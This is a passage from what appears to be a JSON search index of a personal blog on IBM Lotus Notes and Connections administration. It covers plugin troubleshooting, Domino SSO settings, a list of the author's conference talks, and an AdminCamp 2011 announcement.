present!\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-01-26-sametime-and-connections-plugins-in-lotus-notes/","title":"Sametime and Connections Plugins in Lotus Notes"},{"body":"Carl Tyler postet his view and thoughts:\nCarl Tyler’s Blog :: Lotusphere 2012 – How I see things ","excerpt":"\u003cp\u003eCarl Tyler postet his view and thoughts:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.iminstant.com/iminstant/iminstant.nsf/d6plinks/CTYR-8QTRHU\" target=\"_blank\"\u003eCarl\nTyler’s Blog :: Lotusphere 2012 – How I see things \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-01-25-carl-tylers-comment-to-lotusphere-2012/","title":"Carl Tyler’s comment to Lotusphere 2012"},{"body":"In only two weeks starts LCTY Edcom Nachlese 2012 in Munich.\nI prepare a session on Single Sign On in Notes / Domino environments.\nSo i had time to check some settings in Lotus Notes. Since 8.5.3 we have a new option Domino-SSO for Connections Plugin.\nI made several tests with my installed Notes Client on Mac OS, but i had no success. I tested with several settings in the preferences dialog and with different settings in plugin_customization.ini .\nI had one configuration where i can use Sametime Tokenbased Login and leave “Domino Single Sign-On Server” empty in connections preferences, but this works only with running Notes Client and i had to apply the setting again after restart the client.\nNow i deleted the Expeditor folder in my Notes Data to reconfigure the client. What should i say? The SSO-Server works now. I had to use the hierarchical Domino server name. It would be interesting, which technique is used here, because the Domino and Connections Server are in different domains, so it is no LTPA SSO.\nUpdate Only a short add-on. It is LTPA SSO, but i think domain from Web SSO document gets applied.\n","excerpt":"\u003cp\u003eIn only two weeks starts\n\u003ca href=\"http://www.edcom.de/ttacms.nsf/id/nachlese-2012-de\" target=\"_blank\"\u003eLCTY Edcom Nachlese\n2012 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in Munich.\u003c/p\u003e\n\u003cp\u003eI prepare a session on Single Sign On in Notes / Domino environments.\u003c/p\u003e\n\u003cp\u003eSo i had time to check some settings in Lotus Notes. Since 8.5.3 we have\na new option Domino-SSO for Connections Plugin.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2012/01/connections-sso.png\" alt=\"connections sso\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eI made several tests with my installed Notes Client on Mac OS, but i had\nno success. I tested with several settings in the preferences dialog and\nwith\n\u003ca href=\"http://www-10.lotus.com/ldd/lcwiki.nsf/dx/Using_NotesINI_settings_to_configure_Connections_integration\" target=\"_blank\"\u003edifferent\nsettings in plugin_customization.ini \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eI had one configuration where i can use Sametime Tokenbased Login and\nleave “Domino Single Sign-On Server” empty in connections preferences,\nbut this works only with running Notes Client and i had to apply the\nsetting again after restart the client.\u003c/p\u003e","ref":"https://stoeps.de/posts/2012/2012-01-24-notes-client-8-5-3-and-domino-sso-for-connections-plugins/","title":"Notes Client 8.5.3 and Domino-SSO for Connections Plugins"},{"body":"2015 Social Connections 9 – Ehningen / Stuttgart IBM Connections Administration Admincamp 2015 IBM Connections Administration IBM Connections Best Practices Social Connections 8 – Boston Best and Worst Practices Deploying IBM Connections TDI Solution Deep Dive Engage 2015 in Genth, ICS.UG in Bremen ICSUG \u0026amp;#8211; Best and worst practices deploying IBM Connections, IBM ConnectED 2015 Bp203 Best and Worst practices deploying IBM Connections 2014 IBM Connect 2014 Practical Solutions for Connections Admins - Tips and Scripts for your daily business Engage IBM Connect 2014 - BP307 - Practical Solutions for Connections Administrators - Tips and Scripts for Your Daily Business BCCon Tipps Und Skripts aus dem Leben eines Connections Admins Social Connections VI Script it! - Basics to automate IBM WebSphere administration AdminCamp 2014 Notes 9 goes Connections IBM Connections Deep Dive DNUG IBM Connections Deepdive Social Connections VII IBM Connections Deepdive Use Connections Scripts to speed up Installation and Configuration 2013 Social Connections V Saving my time using scripts ICON UK Saving My Time Using Scripts (Extended) AdminCamp Saving my time using scripts Extended IBM Connections - Sicherheit \u0026amp; Administration DNUG – Social Collaboration 39: “Vernetzte Informationswelt” Sparen Sie Zeit bei der Administration von IBM Connections 50. Dannotes http://50.dannotes.dk Saving my time using scripts 2011 AdminCamp IBM Connections Installation unter Linux 2009 AdminCamp Netzwerküberwachung mit dem Open Source Tool Nagios ","excerpt":"\u003ch2 id=\"2015\"\u003e2015 \u003ca href=\"#2015\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"social-connections-9-8211-ehningen--stuttgart\"\u003eSocial Connections 9 – Ehningen / Stuttgart \u003ca href=\"#social-connections-9-8211-ehningen--stuttgart\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/soccnx9-CNXAdministration.pdf\" target=\"_blank\"\u003eIBM Connections Administration \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"admincamp-2015\"\u003eAdmincamp 2015 \u003ca href=\"#admincamp-2015\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/t3s1-ibmconnectionsadministration.pdf\" target=\"_blank\"\u003eIBM Connections Administration \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/t3s5-ibmconnectionsbestpractices.pdf\" target=\"_blank\"\u003eIBM Connections Best Practices \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"social-connections-8-8211-boston\"\u003eSocial Connections 8 – Boston \u003ca href=\"#social-connections-8-8211-boston\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/soccnx8-bestworstpractise.pdf\" target=\"_blank\"\u003eBest and Worst Practices Deploying IBM Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/soccnx8-tdideepdive.pdf\" target=\"_blank\"\u003eTDI Solution Deep Dive \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"engage-2015-in-genth-icsug-in-bremen\"\u003eEngage 2015 in Genth, ICS.UG in Bremen \u003ca href=\"#engage-2015-in-genth-icsug-in-bremen\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/ICSUG-Best-and-worst-practices-deploying-IBM-Connections-english.pdf\" target=\"_blank\"\u003eICSUG \u0026amp;#8211; Best and worst practices deploying IBM Connections, \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"ibm-connected-2015\"\u003eIBM ConnectED 2015 \u003ca href=\"#ibm-connected-2015\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2015-01-bp203-bestandworstpracticesdeployingibmconnectionsfinal.pdf\" target=\"_blank\"\u003eBp203 Best and Worst practices deploying IBM Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"2014\"\u003e2014 \u003ca href=\"#2014\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"ibm-connect-2014\"\u003eIBM Connect 2014 \u003ca href=\"#ibm-connect-2014\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-01-27-bp307.pdf\" target=\"_blank\"\u003ePractical Solutions for Connections Admins - Tips and Scripts for your daily business \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"engage\"\u003eEngage \u003ca href=\"#engage\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/practicalsolutionsforconnectionsadministrators-extended.pdf\" target=\"_blank\"\u003eIBM Connect 2014 - BP307 - Practical Solutions for Connections Administrators - Tips and Scripts for Your Daily Business \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"bccon\"\u003eBCCon \u003ca href=\"#bccon\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-adm01-tippsundskripts.pdf\" target=\"_blank\"\u003eTipps Und Skripts aus dem Leben eines Connections Admins \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"social-connections-vi\"\u003eSocial Connections VI \u003ca href=\"#social-connections-vi\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-06-16-scripting.pdf\" target=\"_blank\"\u003eScript it! - Basics to automate IBM WebSphere administration \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"admincamp-2014\"\u003eAdminCamp 2014 \u003ca href=\"#admincamp-2014\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-t3s1-notes9goesconnections.pdf\" target=\"_blank\"\u003eNotes 9 goes Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-t3s4-connectionsdeepdive.pdf\" target=\"_blank\"\u003eIBM Connections Deep Dive \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"dnug\"\u003eDNUG \u003ca href=\"#dnug\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-11-11-ibmcnxdeepdive.pdf\" target=\"_blank\"\u003eIBM Connections Deepdive \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"social-connections-vii\"\u003eSocial Connections VII \u003ca href=\"#social-connections-vii\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-11-soccnx7-deepdive.pdf\" target=\"_blank\"\u003eIBM Connections Deepdive \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2014-11-soccnx7-scriptpdf\" target=\"_blank\"\u003eUse Connections Scripts to speed up Installation and Configuration \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"2013\"\u003e2013 \u003ca href=\"#2013\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"social-connections-v\"\u003eSocial Connections V \u003ca href=\"#social-connections-v\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2013-socconv-scriptingcnx.pdf\" target=\"_blank\"\u003eSaving my time using scripts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"icon-uk\"\u003eICON UK \u003ca href=\"#icon-uk\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"http://ressources.stoeps.de/iconuk2013/index-ac.html\" target=\"_blank\"\u003eSaving My Time Using Scripts (Extended) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"admincamp\"\u003eAdminCamp \u003ca href=\"#admincamp\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"http://ressources.stoeps.de/iconuk2013/index-ac.html\" target=\"_blank\"\u003eSaving my time using scripts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \u003ci class=\"lab la-html5 la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n Extended\u003c/li\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2013-t3s2-connections-security.pdf\" target=\"_blank\"\u003eIBM Connections - Sicherheit \u0026amp; Administration \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"dnug-8211-social-collaboration-39-8220vernetzte-informationswelt8221\"\u003eDNUG – Social Collaboration 39: “Vernetzte Informationswelt” \u003ca href=\"#dnug-8211-social-collaboration-39-8220vernetzte-informationswelt8221\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2013-zeitsparenmitscriptingspeedup-ibmconnections-administration.pdf\" target=\"_blank\"\u003eSparen Sie Zeit bei der Administration von IBM Connections \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"50-dannotes\"\u003e50. Dannotes \u003ca href=\"http://50.dannotes.dk\" target=\"_blank\"\u003ehttp://50.dannotes.dk \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n \u003ca href=\"#50-dannotes\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2013-11-dannotes.pdf\" target=\"_blank\"\u003eSaving my time using scripts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/united-kingdom.png\"/\u003e\n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"2011\"\u003e2011 \u003ca href=\"#2011\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"admincamp-1\"\u003eAdminCamp \u003ca href=\"#admincamp-1\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2011-t1s4-ibmconnections.pdf\" target=\"_blank\"\u003eIBM Connections Installation unter Linux \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"2009\"\u003e2009 \u003ca href=\"#2009\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h2\u003e\n\n\u003ch3 id=\"admincamp-2\"\u003eAdminCamp \u003ca href=\"#admincamp-2\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h3\u003e\n\n\u003cul\u003e\n\u003cli\u003e\n\u003cspan\u003e\n \u003ca class=\"text-decoration-none\" href=\"https://share.stoeps.de/2011-t3s6-nagios.pdf\" target=\"_blank\"\u003eNetzwerküberwachung mit dem Open Source Tool Nagios \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\n \n \u003ci class=\"las la-file-pdf la-2x align-middle\"\u003e\u003c/i\u003e\n \n \u003cimg class=\"align-middle stoeps-presentation\" src=\"/images/germany.png\"/\u003e\n \n \u003c/a\u003e\n\u003c/span\u003e\n\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/speaking/2015ff/","title":"Talks 2015 and before"},{"body":"Thanks to Marcel de Hoog, i got a solution for the missing pictures in Status Updater Plugin in Lotus Notes.\nAdd com.ibm.lconn.statusupdates/download.image.enabled=true to your plugin_customization.ini. This works on Windows and Mac OS! Haven’t tested it on Linux.\nvia: http://marceldehoog.blogspot.com/2011/12/status-updates-and-pictures.html ","excerpt":"\u003cp\u003eThanks to Marcel de Hoog, i got a solution for the missing pictures in\nStatus Updater Plugin in Lotus Notes.\u003c/p\u003e\n\u003cp\u003eAdd \u003ccode\u003ecom.ibm.lconn.statusupdates/download.image.enabled=true\u003c/code\u003e to your\n\u003ccode\u003eplugin_customization.ini\u003c/code\u003e. This works on Windows and Mac OS! Haven’t\ntested it on Linux.\u003c/p\u003e\n\u003cp\u003evia:\n\u003ca href=\"http://marceldehoog.blogspot.com/2011/12/status-updates-and-pictures.html%c2%a0\" target=\"_blank\"\u003ehttp://marceldehoog.blogspot.com/2011/12/status-updates-and-pictures.html  \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-12-16-notes-plugin-status-updater-shows-no-pictures/","title":"Notes Plugin “Status Updater” shows no pictures"},{"body":"Michael Porter wrote a very interesting article with three examples, why Identity Management is really important.\nSome of the biggest usability pain points I’ve seen had less to do with the UI and more to do with the process of setting the users up correctly so they can see all the content to which they are entitled.\nRead more \u0026gt; Thanks.\n","excerpt":"\u003cp\u003eMichael Porter wrote a very interesting article with three examples, why\nIdentity Management is really important.\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003eSome of the biggest usability pain points I’ve seen had less to do with\nthe UI and more to do with the process of setting the users up correctly\nso they can see all the content to which they are entitled.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://blogs.perficient.com/portals/2011/11/03/why-identity-management-is-important-to-portal-and-collaboration/?utm_source=feedburner\" target=\"_blank\"\u003eRead\nmore \u0026gt; \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eThanks.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-11-07-portal-solutions-blog-why-indentity-management-is-important-to-portal-and-collaboration-2/","title":"Portal Solutions Blog: Why Indentity Management is Important to Portal and Collaboration"},{"body":"Today i had a look in the IBM Lotus and WebSphere Portal Business Solutions Catalog and found the new Plugin IBM Connections alerts posted from Luis Benitez .\nAfter installation i have two more icons in my Sametime Contacts:\nIt looks good and a video on the Solution Catalog Page show the functionality. Plugin works on Windows and Mac OS X.\nAlerts look like this:\n","excerpt":"\u003cp\u003eToday i had a look in the\n\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf\" target=\"_blank\"\u003eIBM Lotus and\nWebSphere Portal Business Solutions Catalog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and found the new Plugin\n\u003ca href=\"https://greenhouse.lotus.com/plugins/plugincatalog.nsf/home_full.xsp?fProduct=Lotus%20Notes%20and%20Domino#\" target=\"_blank\"\u003eIBM\nConnections alerts \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n posted from \u003ca href=\"http://lbenitez.com\" target=\"_blank\"\u003eLuis Benitez \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eAfter installation i have two more icons in my Sametime Contacts:\u003c/p\u003e\n\u003cp\u003eIt looks good and a video on the Solution Catalog Page show the\nfunctionality. Plugin works on Windows and Mac OS X.\u003c/p\u003e\n\u003cp\u003eAlerts look like this:\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-10-27-new-notes-plugin-ibm-connections-alerts/","title":"New Notes Plugin: IBM Connections alerts"},{"body":"categories:\nConference tags: AdminCamp I will speak on AdminCamp 2011. The agenda says Track 1 Session 4 (Thuesday morning).\nI will talk about Lotus Connections 3, my main points will be installation on linux platforms, tipps and hints.\nRegistration is open, so if you have time on 19th to 21th of september, come and visit the AdminCamp. You can register here: http://www.admincamp.de/AdminCampAnmeldung and when you tell them my name on the registration, you save 50€.\nSee you in Gelsenkirchen?\n","excerpt":"\u003cp\u003ecategories:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eConference\ntags:\u003c/li\u003e\n\u003cli\u003eAdminCamp\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eI will speak on \u003ca href=\"http://www.admincamp.de\" target=\"_blank\"\u003eAdminCamp \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n 2011. The agenda says\n\u003ca href=\"http://www.admincamp.de/AdminCamp/Track1Session4\" target=\"_blank\"\u003eTrack 1 Session 4 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\n(Thuesday morning).\u003c/p\u003e\n\u003cp\u003eI will talk about Lotus Connections 3, my main points will be\ninstallation on linux platforms, tipps and hints.\u003c/p\u003e\n\u003cp\u003eRegistration is open, so if you have time on 19th to 21th of september,\ncome and visit the AdminCamp. You can register here:\n\u003ca href=\"http://www.admincamp.de/AdminCampAnmeldung\" 